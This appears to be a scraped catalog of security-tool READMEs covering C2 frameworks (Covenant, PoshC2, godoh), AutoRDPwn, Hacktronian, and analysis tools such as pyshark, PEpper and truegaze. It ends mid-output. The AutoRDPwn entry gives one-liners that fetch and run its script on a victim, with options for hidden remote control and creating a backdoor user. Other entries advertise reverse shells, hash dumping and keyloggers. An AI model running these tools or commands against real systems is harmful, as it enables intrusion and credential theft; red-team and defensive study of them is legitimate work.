image
Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform for red teamers. Covenant is an ASP.NET Core, cross-platform application that includes a web-based interface that allows for multi-user collaboration. Quick-Start Guide Please see the Installation and Startup guide to get started with Covenant! The Wiki documents most of Covenant’s core features and how to use them. Features Covenant has several key features that make it useful and differentiate it from other command and control frameworks: Intuitive Interface – Covenant provides an intuitive web application to easily run a collaborative red team operation. Multi-Platform – Covenant targets .NET Core, which is multi-platform. This allows Covenant to run natively on Linux, MacOS, and Windows platforms. Additionally, Covenant has docker support, allowing it to run within a container on any system that has docker installed. Multi-User – Covenant supports multi-user collaboration. The ability to collaborate has become crucial for effective red team operations. Many users can interact with the same Covenant server and operate independently or collaboratively. API Driven – Covenant is driven by an API that enables multi-user collaboration and is easily extendible. Additionally, Covenant includes a Swagger UI that makes development and debugging easier and more convenient. Listener Profiles – Covenant supports listener “profiles” that control how the network communication between Grunt implants and Covenant listeners look on the wire. Encrypted Key Exchange – Covenant implements an encrypted key exchange between Grunt implants and Covenant listeners that is largely based on a similar exchange in the Empire project, in addition to optional SSL encryption. This achieves the cryptographic property of forward secrecy between Grunt implants. Dynamic Compilation – Covenant uses the Roslyn API for dynamic C# compilation. Every time a new Grunt is generated or a new task is assigned, the relevant code is recompiled and obfuscated with ConfuserEx, avoiding totally static payloads. Covenant reuses much of the compilation code from the SharpGen project, which I described in much more detail in a previous post. Inline C# Execution – Covenant borrows code and ideas from both the SharpGen and SharpShell projects to allow operators to execute C# one-liners on Grunt implants. This allows for similar functionality to that described in the SharpShell post, but allows the one-liners to be executed on remote implants. Tracking Indicators – Covenant tracks “indicators” throughout an operation, and summarizes them in the Indicators menu. This allows an operator to conduct actions that are tracked throughout an operation and easily summarize those actions to the blue team during or at the end of an assessment for deconfliction and educational purposes. This feature is still in it’s infancy and still has room for improvement. Developed in C# – Personally, I enjoy developing in C#, which may not be a surprise for anyone that has read my latest blogs or tools. Not everyone might agree that development in C# is ideal, but hopefully everyone agrees that it is nice to have all components of the framework written in the same language. I’ve found it very convenient to write the server, client, and implant all in the same language. This may not be a true “feature”, but hopefully it allows others to contribute to the project fairly easily. Questions and Discussion Have questions or want to chat more about Covenant? Join the #Covenant channel in the BloodHound Gang Slack . Download Covenant

image
AutoRDPwn is a post-exploitation framework created in Powershell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view his victim’s desktop without his consent, and even control it on-demand, using tools native to the operating system itself. Thanks to the additional modules, it is possible to obtain a remote shell through Netcat, dump system hashes with Mimikatz, load a remote keylogger and much more. All this, Through a completely intuitive menu in seven different languages. Additionally, it is possible to use it in a reverse shell through a series of parameters that are described in the usage section. Requirements Powershell 4.0 or higher Changes Version 5.0 • New logo completely redesigned from scratch • Full translation in 7 languages: es, en, fr, de, it, ru, pt • Remote execution through a reverse shell with UAC and AMSI Bypass • Partial support from Linux (more information in the user guide) • Improved remote execution (internet connection is no longer necessary on the victim) • New section available: Backdoors and persistence • New module available: Remote Keylogger • New section available: Privilege escalation • New module available: Obtain information from the operating system • New module available: Search vulnerabilities with Sherlock • New module available: Escalate privileges with PowerUp • New section available: Other Modules • New module available: Execute an external script *The rest of the changes can be consulted in the CHANGELOG file Use This application can be used locally, remotely or to pivot between teams. When used remotely in a reverse shell, it is necessary to use the following parameters: -admin / -noadmin -> Depending on the permissions we have, we will use one or the other -nogui -> This will avoid loading the menu and some colors, guaranteed its functionality -lang -> We will choose our language (English, Spanish, French, German, Italian, Russian or Portuguese) -option -> As with the menu, we can choose how to launch the attack -shadow -> We will decide if we want to see or control the remote device -createuser -> This parameter is optional, the user AutoRDPwn (password: AutoRDPwn) will be created on the victim machine Local execution on one line: powershell -ep bypass “cd $ env: temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .AutoRDPwn.ps1” Example of remote execution on a line: powershell -ep bypass “cd $ env: temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser” The detailed guide of use can be found at the following link: https://darkbyte.net/autordpwn-la-guia-definitiva Screenshots Credits and Acknowledgments This framework uses the following scripts and tools: • Chachi-Enumerator of Luis Vacas -> https://github.com/Hackplayers/PsCabesha-tools • Get-System from HarmJ0y & Matt Graeber -> https://github.com/HarmJ0y/Misc-PowerShell • Invoke-DCOM of Steve Borosh -> https://github.com/rvrsh3ll/Misc-Powershell-Scripts • Invoke-MetasploitPayload of Jared Haight -> https://github.com/jaredhaight/Invoke-MetasploitPayload • Invoke-Phant0m of Halil Dalabasmaz -> https://github.com/hlldz/Invoke-Phant0m • Invoke-PowerShellTcp of Nikhil “SamratAshok” Mittal -> https://github.com/samratashok/nishang • Invoke-TheHash by Kevin Robertson -> https://github.com/Kevin-Robertson/Invoke-TheHash • Mimikatz from Benjamin Delpy -> https://github.com/gentilkiwi/mimikatz • PsExec from Mark Russinovich -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec • RDP Wrapper of Stas’M Corp. -> https://github.com/stascorp/rdpwrap • SessionGopher of Brandon Arvanaghi -> https://github.com/Arvanaghi/SessionGopher And many more, that do not fit here .. Thanks to all of them and their excellent work. Contact This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it. For more information, you can contact through [email protected] Download AutoRDPwn

image
PoshC2 is a proxy aware C2 framework that utilises Powershell and/or equivalent (System.Management.Automation.dll) to aid penetration testers with red teaming, post-exploitation and lateral movement. Powershell was chosen as the base implant language as it provides all of the functionality and rich features without needing to introduce multiple third party libraries to the framework. In addition to the Powershell implant, PoshC2 also has a basic dropper written purely in Python that can be used for command and control over Unix based systems such as Mac OS or Ubuntu. The server-side component is written in Python for cross-platform portability and speed, a Powershell server component still exists and can be installed using the ‘Windows Install’ as shown below but will not be maintained with future updates and releases. Linux Install Python3 Automatic install for Python3 using curl & bash curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2_Python/master/Install.sh | bash Manual install Python3 wget https://raw.githubusercontent.com/nettitude/PoshC2_Python/master/Install.sh chmod +x ./Install.sh ./Install.sh Linux Install Python2 – stable but unmaintained Automatic install for Python2 using curl & bash curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2_Python/python2/Install.sh | bash Manual install Python2 wget https://raw.githubusercontent.com/nettitude/PoshC2_Python/python2/Install.sh chmod +x ./Install.sh ./Install.sh Windows Install Install Git and Python (and ensure Python is in the PATH), then run: powershell -exec bypass -c “IEX (New-Object System.Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/nettitude/PoshC2_Python/master/Install.ps1’)” Using older versions You can use an older version of PoshC2 by referencing the appropriate tag. You can list the tags for the repository by issuing: git tag –list or viewing them online. Then you can use the install one-liner but replace the branch name with the tag: curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2_Python//Install.sh | bash For example: curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2_Python/v4.8/Install.sh | bash Offline If you have a local clone of PoshC2 you can change the version that is in use by just checking out the version you want to use: git reset –hard For example: git reset –hard v4.8 However note that this will overwrite any local changes to files, such as Config.py and you may have to re-run the install script for that version or re-setup the environment appropriately. Running PoshC2 Edit the config file by running posh-config to open it in $EDITOR. If this variable is not set then it defaults to vim, or you can use –nano to open it in nano. Run the server using posh-server or python3 -u C2Server.py | tee -a /var/log/poshc2_server.log Others can view the log using posh-log or tail -n 5000 -f /var/log/poshc2_server.log Interact with the implants using the handler, run by using posh or python3 ImplantHandler.py Installing as a service Installing as a service provides multiple benefits such as being able to log to service logs, viewing with journalctl and automatically starting on reboot. Add the file in systemd (this is automatically done via the install script) cp poshc2.service /lib/systemd/system/poshc2.service Start the service posh-service View the log: posh-log Or alternatively us journalctl (but note this can be rate limited) journalctl -n 20000 -u poshc2.service -f –output cat Note that re-running posh-service will restart the posh-service. Running posh-service will automatically start to display the log, but Ctrl-C will not stop the service only quit the log in this case posh-log can be used to re-view the log at any point. posh-stop-service can be used to stop the service. Issues / FAQs If you are experiencing any issues during the installation or use of PoshC2 please check the known issues below and the open issues tracking page within GitHub. If this page doesn’t have what you’re looking for please open a new issue and we will try to resolve the issue asap. If you are looking for tips and tricks on PoshC2 usage and optimisation, you are welcome to join the slack channel below. License / Terms of Use This software should only be used for authorised testing activity and not for malicious use. By downloading this software you are accepting the terms of use and the licensing agreement. Documentation We maintain PoshC2 documentation over at https://poshc2.readthedocs.io/en/latest/ Find us on #Slack – poshc2.slack.com (to request an invite send an email to [email protected] ) Known issues Error encrypting value: object type If you get this error after installing PoshC2 it is due to dependency clashes in the pip packages on the system. Try creating a virtualenv in python and re-install the requirements so that the exact versions specified are in use for PoshC2. Make sure you deactivate when you’ve finished in this virtualenv. For example: pip install virtualenv virtualenv /opt/PoshC2_Python/ source /opt/PoshC2_Python/bin/activate pip install -r requirements.txt python C2Server.py Note anytime you run PoshC2 you have to reactivate the virtual environment and run it in that. The use of a virtual environment is abstracted if you use the posh- scripts on *nix. Download PoshC2_Python

image
Pentesing Tools That All Hacker Needs. HACKTRONIAN Menu : Information Gathering Password Attacks Wireless Testing Exploitation Tools Sniffing & Spoofing Web Hacking Private Web Hacking Post Exploitation Install The HACKTRONIAN Information Gathering: Nmap Setoolkit Port Scanning Host To IP wordpress user CMS scanner XSStrike Dork – Google Dorks Passive Vulnerability Auditor Scan A server’s Users Crips Password Attacks: Cupp Ncrack Wireless Testing: reaver pixiewps Fluxion Exploitation Tools: ATSCAN sqlmap Shellnoob commix FTP Auto Bypass jboss-autopwn Sniffing & Spoofing: Setoolkit SSLtrip pyPISHER SMTP Mailer Web Hacking: Drupal Hacking Inurlbr WordPress & Joomla Scanner Gravity Form Scanner File Upload Checker WordPress Exploit Scanner WordPress Plugins Scanner Shell and Directory Finder Joomla! 1.5 – 3.4.5 remote code execution Vbulletin 5.X remote code execution BruteX – Automatically brute force all services running on a target Arachni – Web Application Security Scanner Framework Private Web Hacking: Get all websites Get joomla websites Get wordpress websites Control Panel Finder Zip Files Finder Upload File Finder Get server users SQli Scanner Ports Scan (range of ports) ports Scan (common ports) Get server Info Bypass Cloudflare Post Exploitation: Shell Checker POET Weeman Installation in Linux: This Tool Must Run As ROOT !!! git clone https://github.com/thehackingsage/hacktronian.git cd hacktronian chmod +x install.sh ./install.sh That’s it.. you can execute tool by typing hacktronian Installation in Android : Open Termux pkg install git pkg install python git clone https://github.com/thehackingsage/hacktronian.git cd hacktronian chmod +x hacktronian.py python2 hacktronian.py Video Tutorial : Download Hacktronian

image
Python wrapper for tshark, allowing python packet parsing using wireshark dissectors. Extended documentation: http://kiminewt.github.io/pyshark Python2 deprecation – This package no longer supports Python2. If you wish to still use it in Python2, you can: Use version 0.3.8 Install pyshark-legacy via pypi Clone the pyshark-legacy [repo ( https://github.com/KimiNewt/pyshark-legacy )], where bugfixes will be applied. Looking for contributors – for various reasons I have a hard time finding time to maintain and enhance the package at the moment. Any pull-requests will be reviewed and if any one is interested and is suitable, I will be happy to include them in the project. Feel free to mail me at dorgreen1 at gmail. There are quite a few python packet parsing modules, this one is different because it doesn’t actually parse any packets, it simply uses tshark’s (wireshark command-line utility) ability to export XMLs to use its parsing. This package allows parsing from a capture file or a live capture, using all wireshark dissectors you have installed. Tested on windows/linux. Installation All Platforms Simply run the following to install the latest from pypi pip install pyshark Or install from the git repository: git clone https://github.com/KimiNewt/pyshark.git cd pyshark/src python setup.py install Mac OS X You may have to install libxml which can be unexpected. If you receive an error from clang or an error message about libxml, run the following: xcode-select –install pip install libxml You will probably have to accept a EULA for XCode so be ready to click an “Accept” dialog in the GUI. Usage Reading from a capture file: >>> import pyshark >>> cap = pyshark.FileCapture(‘/tmp/mycapture.cap’) >>> cap >>> print cap[0] Packet (Length: 698) Layer ETH: Destination: BLANKED Source: BLANKED Type: IP (0x0800) Layer IP: Version: 4 Header Length: 20 bytes Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00: Not-ECT (Not ECN-Capable Transport)) Total Length: 684 Identification: 0x254f (9551) Flags: 0x00 Fragment offset: 0 Time to live: 1 Protocol: UDP (17) Header checksum: 0xe148 [correct] Source: BLANKED Destination: BLANKED … Other options param keep_packets : Whether to keep packets after reading them via next(). Used to conserve memory when reading large caps. param input_file : Either a path or a file-like object containing either a packet capture file (PCAP, PCAP-NG..) or a TShark xml. param display_filter : A display (wireshark) filter to apply on the cap before reading it. param only_summaries : Only produce packet summaries, much faster but includes very little information param disable_protocol : Disable detection of a protocol (tshark > version 2) param decryption_key : Key used to encrypt and decrypt captured traffic. param encryption_type : Standard of encryption used in captured traffic (must be either ‘WEP’, ‘WPA-PWD’, or ‘WPA-PWK’. Defaults to WPA-PWK. param tshark_path : Path of the tshark binary Reading from a live interface: >>> capture = pyshark.LiveCapture(interface=’eth0′) >>> capture.sniff(timeout=50) >>> capture >>> capture[3] for packet in capture.sniff_continuously(packet_count=5): print ‘Just arrived:’, packet Other options param interface : Name of the interface to sniff on. If not given, takes the first available. param bpf_filter : BPF filter to use on packets. param display_filter : Display (wireshark) filter to use. param only_summaries : Only produce packet summaries, much faster but includes very little information param disable_protocol : Disable detection of a protocol (tshark > version 2) param decryption_key : Key used to encrypt and decrypt captured traffic. param encryption_type : Standard of encryption used in captured traffic (must be either ‘WEP’, ‘WPA-PWD’, or ‘WPA-PWK’. Defaults to WPA-PWK). param tshark_path : Path of the tshark binary param output_file : Additionally save captured packets to this file. Reading from a live interface using a ring buffer >>> capture = pyshark.LiveRingCapture(interface=’eth0′) >>> capture.sniff(timeout=50) >>> capture >>> capture[3] for packet in capture.sniff_continuously(packet_count=5): print ‘Just arrived:’, packet Other options param ring_file_size : Size of the ring file in kB, default is 1024 param num_ring_files : Number of ring files to keep, default is 1 param ring_file_name : Name of the ring file, default is /tmp/pyshark.pcap param interface : Name of the interface to sniff on. If not given, takes the first available. param bpf_filter : BPF filter to use on packets. param display_filter : Display (wireshark) filter to use. param only_summaries : Only produce packet summaries, much faster but includes very little information param disable_protocol : Disable detection of a protocol (tshark > version 2) param decryption_key : Key used to encrypt and decrypt captured traffic. param encryption_type : Standard of encryption used in captured traffic (must be either ‘WEP’, ‘WPA-PWD’, or ‘WPA-PWK’. Defaults to WPA-PWK). param tshark_path : Path of the tshark binary param output_file : Additionally save captured packets to this file. Reading from a live remote interface: >>> capture = pyshark.RemoteCapture(‘192.168.1.101’, ‘eth0’) >>> capture.sniff(timeout=50) >>> capture Other options param remote_host : The remote host to capture on (IP or hostname). Should be running rpcapd. param remote_interface : The remote interface on the remote machine to capture on. Note that on windows it is not the device display name but the true interface name (i.e. DeviceNPF_..). param remote_port : The remote port the rpcapd service is listening on param bpf_filter : A BPF (tcpdump) filter to apply on the cap before reading. param only_summaries : Only produce packet summaries, much faster but includes very little information param disable_protocol : Disable detection of a protocol (tshark > version 2) param decryption_key : Key used to encrypt and decrypt captured traffic. param encryption_type : Standard of encryption used in captured traffic (must be either ‘WEP’, ‘WPA-PWD’, or ‘WPA-PWK’. Defaults to WPA-PWK). param tshark_path : Path of the tshark binary Accessing packet data: Data can be accessed in multiple ways. Packets are divided into layers, first you have to reach the appropriate layer and then you can select your field. All of the following work: >>> packet[‘ip’].dst 192.168.0.1 >>> packet.ip.src 192.168.0.100 >>> packet[2].src 192.168.0.100 To test whether a layer is in a packet, you can use its name: >>> ‘IP’ in packet True To see all possible field names, use the packet.layer.field_names attribute (i.e. packet.ip.field_names ) or the autocomplete function on your interpreter. You can also get the original binary data of a field, or a pretty description of it: >>> p.ip.addr.showname Source or Destination Address: 10.0.0.10 (10.0.0.10) # And some new attributes as well: >>> p.ip.addr.int_value 167772170 >>> p.ip.addr.binary_value ‘nx00x00n’ Decrypting packet captures Pyshark supports automatic decryption of traces using the WEP, WPA-PWD, and WPA-PSK standards (WPA-PWD is the default). >>> cap1 = pyshark.FileCapture(‘/tmp/capture1.cap’, decryption_key=’password’) >>> cap2 = pyshark.LiveCapture(interface=’wi0′, decryption_key=’password’, encryption_type=’wpa-psk’) A tuple of supported encryption standards, SUPPORTED_ENCRYPTION_STANDARDS, exists in each capture class. >>> pyshark.FileCapture.SUPPORTED_ENCRYPTION_STANDARDS (‘wep’, ‘wpa-pwd’, ‘wpa-psk’) >>> pyshark.LiveCapture.SUPPORTED_ENCRYPTION_STANDARDS (‘wep’, ‘wpa-pwd’, ‘wpa-psk’) Download Pyshark

image
Hello! Welcome to applepie! This is a tool designed for fuzzing, introspection, and finding bugs! This is a hypervisor using the Windows Hypervisor Platform API present in recent versions of Windows (specifically this was developed and tested on Windows 10 17763). Bochs is used for providing deep introspection and device emulation. The Windows Hypervisor Platform API (WHVP) is an API set for accessing Hyper-V’s hypervisor abilities. This API makes it easy for us to implement a virtual machine all in user-space without any special drivers or permissions needed. Recent Feature Demo Binary Coverage Example What is this for? This is a tool designed for fuzzing and introspection during security research. By using a hypervisor common fuzzing techniques can be applied to any target, kernel or userland. This environment allows fuzzing of whole systems without a need for source of the target. At the hypervisor level code coverage can be gathered, and if needed Bochs emulation can be used to provide arbitrary introspection in an emulation environment. This coverage information can be used to figure out the effectiveness of the fuzz cases. A fuzz case that caused an increase in coverage can be saved as it was an interesting case. This input can be used later, built on by new corruptions. Snapshot fuzzing is the primary use of this tool. Where you take a snapshot of a system in a certain state, and save it off. This snapshot can then be loaded up for fuzzing, where a fuzz case is injected, and it’s resumed. Since the VM can be reset very cheaply, the VM can be reset often. If it takes Word 5 seconds to boot, but you can snapshot it right as it reads your file, you can cut the fuzz case down to only what is relevant to an input. This allows for a very tight loop of fuzzing without needing to have access to source. Since the VM’s are entirely separate systems, many can be run in parallel to allow scaling to all cores. Currently this tool only supports gathering code coverage, dynamic symbol downloading for Windows, and symbol/module parsing for Windows targets as well. Adding fuzzing support will be quite soon. Development cycle Given I’ve written almost all the features here before (coverage, fuzzing, fast resets, etc). I expect this project should pretty quickly become ready for fuzzing, unless I get distracted 😀 I’m aiming for end-of-January for coverage (done!), feedback, module listings (done!), process lists, fast resets, and symbol support (done!). Which would make it a very capable fuzzer. OS Support The main supported target is modern Windows 10. Windows targets have downloading of symbols from the symbol store. This allows for symbolic coverage in Windows targets out of the box. However, the code is written in a way that Linux enlightenment can easily be added. Without any enlightment, any OS that boots can still be fuzzed and basic coverage can be gathered. Before reporting OS support issues please validate that the issue is in the hypervisor/changes to Bochs by trying to boot your target using standard prebuilt Bochs with no hypervisor. Bochs is not commonly used and can frequently have breaking bugs for even common things like booting Linux. Especially with the rapid internal changes to CPUID/MSR usages with Spectre/Meltdown mitigations going into OSes. Issues See the issues page on Github for a list of issues. I’ve seeded it with a few already. Some of these need to be addressed quickly before fuzzing development starts. Building Build Prereqs To build this you need a few things: Recently updated MSVC compiler (Visual Studio 2017) Nightly Rust ( https://rustup.rs/ , must be nightly) Python (I used 3 but 2 should work too) 64-bit cygwin with autoconf and GNU make packages installed Hyper-V installed and a recent build of Windows 10 MSVC Install Visual Studio 2017 and make sure it’s updated. We’re using some bleeding edge APIs, headers, and libraries here. I was using cl.exe version: Microsoft (R) C/C++ Optimizing [ Compiler ]( “Compiler” ) Version 19.16.27025.1 for x64 And SDK version 10.0.17763.0 Nightly Rust Install Rust via https://rustup.rs/ . I used rustc 1.32.0-nightly (b3af09205 2018-12-04) Make sure you install the x86_64-pc-windows-msvc toolchain as only 64-bit is supported for this project. Make sure cargo is in your path. This should be the default. Python Go grab python https://www.python.org/ and make sure it’s in your PATH such that python can be invoked. Cygwin Install 64-bit Cygwin ( https://www.cygwin.com/setup-x86_64.exe ) specifically to C:cygwin64 . When installing Cygwin make sure you install the autoconf and make packages. Hyper-V Go into “Turn Windows features on or off” and tick the checkbox next to “Hyper-V” and “Windows Hypervisor Platform”. This requires of course that your computer supports Hyper-V. Step-by-step build process This install process guide was verified on the following: Clean install of Windows 10, Build 17763 rustc 1.33.0-nightly (8e2063d02 2019-01-07) Microsoft (R) C/C++ Optimizing Compiler Version 19.16.27025.1 for x64 Visual Studio Community 2017 version 15.9.4 applepie commit `f84c084feb487e2e7f31f9052a4ab0addd2c4cf9` Python 3.7.2 x64 git version 2.20.1.windows.1 Make sure Windows 10 is fully up to date We use some bleeding edge features with WHVP and only latest Windows 10 is tested In “Turn Windows features on or off” Tick “Hyper-V” Tick “Windows Hypervisor Platform” Click ok to install and reboot Install VS Community 2017 and updated Desktop development with C++ Install Rust nightly for x86_64-pc-windows-msvc Install Git Configure git to checkout as-is, commit unix-style If git converts on checkout the ./configure script will fail for Bochs due to CRLF line endings This is core.autocrlf=input You can also use checkout as-is, commit as-is This is core.autocrlf=false Install Cygwin x64 via setup-x86_64.exe Install to “C:cygwin64” Install autoconf package ( autoconf package) Install GNU make ( make package) Install Python I installed Python 3 x64 and added to PATH Python 2 and 32-bit versions should be fine, we just use Python for our build script Open a “x64 Native Tools Command Prompt for VS 2017” Checkout applepie via git clone https://github.com/gamozolabs/applepie cd into applepie Run python build.py This will first check for some basic system requirements It will build the Rust bochservisor DLL It will then configure Bochs via autoconf It will then build Bochs with GNU make from Cygwin This initial build process may take about 2 minutes, on a modern machine it’s likely 20-30 seconds. Actually Building Just run python build.py from the root directory of this project. It should check for sanity of the environment and everything should “just work”. Cleaning Run python build.py clean to clean Bochs and Rust binaries. Run python build.py deepclean to completely remove all Bochs and Rust binaries, it also removes all the configuration for Bochs. Use this if you reconfigure Bochs in some way. Usage Read up on Bochs configuration to figure out how to set up your environment. We have a few requirements, like sync=none , ips=1000000 , and currently single processor support only. These are enforced inside of the code itself to make sure you don’t shoot yourself in the foot. Use the included bochservisor_testbochsrc.bxrc and bochservisor_test_realbochsrc.bxrc configurations as examples. bochservisor_test_real is likely the most up to date config you should look at as reference. Coverage Windows targets have module list enlightenment, which allows us to see the listings for all the modules in the context we are running in. With this we can convert the instruction addresses to module + offset. This module + offset helps keep coverage information between fuzz cases where ASLR state changes. It also allows for the module to be colored in a tool like IDA to visually see what code has been hit. For Windows targets, symbols will be dynamically downloaded from the symbol store using your _NT_SYMBOL_PATH and using symchk . Without symchk in the path it will silently fail. With symbols a nice human-readable version of coverage can be saved for viewing. Further, with private symbols the coverage can be converted to source:line such that source code can be colored. Tests Okay there aren’t really tests, but there’s bochservisor_test which is a tiny OS that just verifies that everything boots with the hypervisor. There’s then bochservisor_test_real which is a configuration I use for things like Windows/Linux. This is the one that will probably get updated most frequently. Architecture Basics This codebase introduces a small amount of code to Bochs to allow modular access to CPU context, guest physical to their backing memory, and stepping both device and CPU state. The main code you want to look at is in lib.rs in the bochservisor Rust project. CPU Loop In the main CPU loop of Bochs we instead LoadLibrary() to load the bochservisor DLL. This DLL exports one routine which is the Rust CPU loop which will be invoked. Bochs will pass a structure to this bochs_cpu_loop routine which will contain function pointers to get information from Bochs and to step the device and CPU state in it. MMIO / I/O When MMIO or I/O occurs, the hypervisor will exit with a memory fault or an I/O instruction fault. While WHVP does provide an emulation API it’s really lacking and not sufficient. Rather we use Bochs which is already there and step through a few instructions. By keeping the hypervisor CPU state in sync with Bochs we can dynamically switch between hypervisor and emulation at any time (or at least we should be able to). This means that the full hypervisor state is always in sync with Bochs and thus things like Bochs snapshots should work as normal and could be booted without the hypervisor (except maybe some CPUID state which needs to be stored in the snapshot info). When MMIO or I/O occurs we run a certain number of instructions under emulation rather than just emulating one. Due to the API costs of entering and exiting the hypervisor, and the likelihood that similar MMIO operations occur next to others, we step a few instructions. This allows use to reduce the overhead of the API and reduces the VMEXIT frequency. This is a tunable number but what is in the codebase is likely there for a reason. Interrupts Interrupts we handle in a really interesting way. Rather than scheduling interrupts to be delivered to the hypervisor we handle _ all _ interrupts in Bochs emulation itself. Things like exceptions that happen inside of the hypervisor entirely of course are not handled by Bochs. This also gives us features that WHVP doesn’t support, like SMIs (for SMM). Bochs’s BIOS uses SMM by default and without SMI support a custom BIOS needs to be built. I did this in my first iteration of this… do not recommend. Future This project is designed for fuzzing, however it’s so new (only a few days old) that it has none of these features. Some of the first things to come will be: Evaluate threading We could potentially have Bochs device stuff running in one thread in a loop in real-time, and another thread running the hypervisor. Async events would be communicated via IPC and would allow for the devices to be updated while execution is in the guest. Currently everything happens in one thread which means the hypervisor must exit on an interval to make sure we can step devices. It’s as if we wrote our own scheduler. This might be a bit faster, but it also increases complexity and adds the potential for race issues. It’s hard to say if this will ever happen. Code coverage I’m not sure which method I’ll use to gather code coverage, but there will be at least a few options. Spanning from accurate, to fast, etc. All these coverage mechanisms will be system level and will not require source or symbols of targets. Guest enlightenment Parsing of OS structures to get primitive information such as process listings, module lists, etc. This would then be used to query PDBs to get symbol information. Crash reporting Reporting crashes in some meaningful way. Ideally minidumps would be nice as they could be loaded up and processed in WinDbg. This might be fairly easy as DMPs are just physical memory and processor context, which we already have. Crash deduping / root causing I’ve got some fun techniques for root causing bugs which have been historically successful. I plan to bring those here. Fast resets By tracking dirty pages and restoring only modified things we should be able to reset VMs very quickly. This gives us the ability to fuzz at maximum speeds on all cores of a system target. This is similar to what I did in falkervisor so it’s already thought out and designed. It just needs to be ported here. falkervisor mode Extremely fast fuzzing that cancels execution when MMIO or I/O occurs. This allows all the CPU time to be spent in the hypervisor and no emulation time. This has a downside of not supporting things like disk I/O during a fuzz case, but it’s nice. Philosophy Some of the core concepts of this project are absolute minimum modifications to Bochs. This allows us to keep the Bochs portion of this repo up to date. The goal is to also move as much code into Rust and dlls as possible to make the system much more modular and safe. This will hopefully reduce the chances of making silly corruption bugs in the hypervisor itself, causing invalid fuzz results. Currently the hypervisor is a DLL and can be swapped out without changes to Bochs (unless the FFI API changes). Further changes to Bochs itself must be documented clearly, and I’ll be making a document for that shortly to track the changes to Bochs which must be ported and re-evaluated with Bochs updates. Download Applepie

image
An open source tool to perform _ malware static analysis _ on P ortable E xecutable Installation [email protected]:~$ git clone https://github.com/Th3Hurrican3/PEpper/ [email protected]:~$ cd PEpper [email protected]:~$ pip3 install -r requirements.txt [email protected]:~$ python3 pepper.py ./malware_dir Screenshot CSV output Feature extracted Suspicious entropy ratio Suspicious name ratio Suspicious code size Suspicious debugging time-stamp Number of export Number of anti-debugging calls Number of virtual-machine detection calls Number of suspicious API calls Number of suspicious strings Number of YARA rules matches Number of URL found Number of IP found _ Cookie on the stack _ ( GS ) support _ Control Flow Guard _ ( CFG ) support _ Data Execution Prevention _ ( DEP ) support _ Address Space Layout Randomization _ ( ASLR ) support _ Structured Exception Handling _ ( SEH ) support _ Thread Local Storage _ ( TLS ) support Presence of manifest Presence of version Presence of digital certificate Packer detection VirusTotal database detection Import hash Notes Can be run on _ single _ or _ multiple _ PE (placed inside a directory) Output will be saved (in the same directory of _ pepper.py _ ) as output.csv To use VirusTotal scan , add your private key in the module called “virustotal.py” (Internet connection required) Credits Many thanks to those who indirectly helped me in this work, specially: The LIEF project and its awesome library PEstudio , a really amazing software to analyze PE PEframe from guelfoweb , an incredible widespread tool to perform static analysis on Portable Executable malware and malicious MS Office documents Yara-Rules project, which provides compiled signatures, classified and kept as up to date as possible Download PEpper

image
godoh is a proof of concept Command and Control framework, written in Golang, that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google, Cloudflare but also contains the ability to use traditional DNS. Installation All you would need are the godoh binaries themselves. Binaries are available for download from the releases page as part of tagged releases. To build godoh from source, follow the following steps: Ensure you have dep installed ( go get -v -u github.com/golang/dep/cmd/dep ) Clone this repository to your $GOPATH ‘s src/ directory so that it is in sensepost/godoh Run dep ensure to resolve dependencies Run make key to generate a unique encryption key to use for communication Use the go build tools, or run make to build the binaries in the build/ directory usage $ godoh -h A DNS (over-HTTPS) C2 Version: dev By @leonjza from @sensepost Usage: godoh [command] Usage: godoh [command] Available Commands: agent Connect as an Agent to the DoH C2 c2 Starts the godoh C2 server help Help about any command receive Receive a file via DoH send Send a file via DoH test Test DNS communications Flags: -d, –domain string DNS Domain to use. (ie: example.com) -h, –help help for godoh -p, –provider string Preferred DNS provider to use. [possible: google, cloudflare, raw] (default “google”) Use “godoh [command] –help” for more information about a command. Download goDoH

image
A static analysis tool for Android and iOS applications focusing on security issues outside the source code such as resource strings, third party libraries and configuration files. Requirements Python 3 is required and you can find all required modules in the requirements.txt file. Only tested on Python 3.7 but should work on other 3.x releases. No plans to 2.x support at this time. Installation You can install this via PIP as follows: pip install truegaze truegaze To download and run manually, do the following: git clone https://github.com/nightwatchcybersecurity/truegaze.git cd truegaze pip -r requirements.txt python -m truegaze.cli How to use To list modules: truegaze list To scan an application: truegaze scan test.apk truegaze scan test.ipa Sample output Listing modules: [email protected]:~/$ truegaze list Total active plugins: 1 +—————-+——————————————+———+——+ | Name | Description | Android | iOS | +—————-+——————————————+———+——+ | AdobeMobileSdk | Detection of incorrect SSL configuration | True | True | | | in the Adobe Mobile SDK | | | +—————-+——————————————+———+——+ Scanning an application: [email protected]localhost:~/$ truegaze scan ~/test.ipa Identified as an iOS application via a manifest located at: Payload/IPAPatch-DummyApp.app/Info.plist Scanning using the “AdobeMobileSdk” plugin — Found 1 configuration file(s) — Scanning “Payload/IPAPatch-DummyApp.app/Base.lproj/ADBMobileConfig.json’ —- FOUND: The [“analytics”][“ssl”] setting is missing or false – SSL is not being used —- FOUND: The [“remotes”][“analytics.poi”] URL doesn’t use SSL: http://assets.example.com/c234243g4g4rg.json —- FOUND: The [“remotes”][“messages”] URL doesn’t use SSL: http://assets.example.com/b34343443egerg.json —- FOUND: A “templateurl” in [“messages”][“payload”] doesn’t use SSL: http://my.server.com/?user={user.name}&zip={user.zip}&c16={%sdkver%}&c27=cln,{a.PrevSessionLength} —- FOUND: A “templateurl” in [“messages”][“payload”] doesn’t use SSL: 